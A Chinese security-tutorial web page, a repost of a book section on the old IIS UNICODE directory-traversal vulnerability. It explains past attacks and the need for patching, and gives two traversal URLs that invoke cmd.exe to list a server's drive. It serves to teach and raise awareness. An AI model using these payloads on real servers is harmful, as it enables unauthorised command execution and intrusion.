当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(12)

安全基础
正常关机后光电鼠标仍发光怎么解决
金山安全反病毒专家教你认识和安装系统补丁
微软IE团队成员揭秘中国网银不兼容非IE浏览器的原因
防火墙端口扫描和路径追踪设置防黑客入侵
压缩包里的压缩文件加上缩略图的方法
拒绝修改exe文件关联随EXE程序启动的木马
保护硬盘隐私数据防止黑客窃取的操作小方法
开机按F1故障怎么解决(新手学电脑)
实用技巧:自定义软件安装的默认路径
快速打开控制面板中的某一项目
避免网购被骗 揭秘网络钓鱼的9种骗术
删不掉文件的原因和辅助删除的软件工具
隐藏的系统克隆帐户全了解
剖析DDOS攻击的原理 提供解决方法
360安全卫士完美帮你系统打补丁
桌面多出几个IE图标有的不能删除怎么办
加载*dll出错,系统找不到指定的模块
如何揪出并根除Windows系统启动项
菜鸟防止黑客攻击的10个系统设置方法
新手学电脑:宽带拨号的设置方法

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(12)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 35 ::
收藏到网摘: n/a

6.9 UNICODE漏洞入侵(1)

    

6.9  UNICODE漏洞入侵

风光了很久的UNICODE漏洞是经常被入侵者利用的漏洞之一。在200151日大战中,黑客们就普遍利用此漏洞对各国网站进行攻击,究其原因:一是由于此漏洞刚公布不久,二是网络安全管理员安全意识低下,对UNICODE漏洞不进行及时的修补,使入侵者通过UNICODE漏洞入侵网站得逞。

但是现在网上还有很多服务器还存在着UNICODE漏洞,此漏洞可以使一般稍懂计算机的人直接通过浏览器,向存有漏洞的服务器发送请求,就可以入侵存有UNICODE漏洞的服务器。

接下来将全面讲述入侵者是如何利用此漏洞对网站进行入侵,也希望可以引起管理员们的安全意识,尽快对UNICODE漏洞进行修补(修补方法请读阅3.7.1 节中UNICODE漏洞的修补)

6.9.1  用于UNICODE漏洞入侵的命令

下面以中文版Windows 2000为例,对于其他版本只需更改其编码即可,参阅3.7.1 节中UNICODE漏洞的修补。

首先将介绍入侵者在入侵存在UNICODE漏洞的服务器时所涉及到的有关命令,其实有些命令和在DOS下使用的命令是一样的,但如CD这一类命令则不可用。

1. dir命令

列出目标计算机的目录。在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\

或者

http://127.0.0.1/scripts /..%c0%2f../ winnt/system32/cmd.exe?/c+dir+d:\

以上内容是使用dir命令,让存在UNICODE漏洞的服务器列出d盘的目录,如图6-65所示。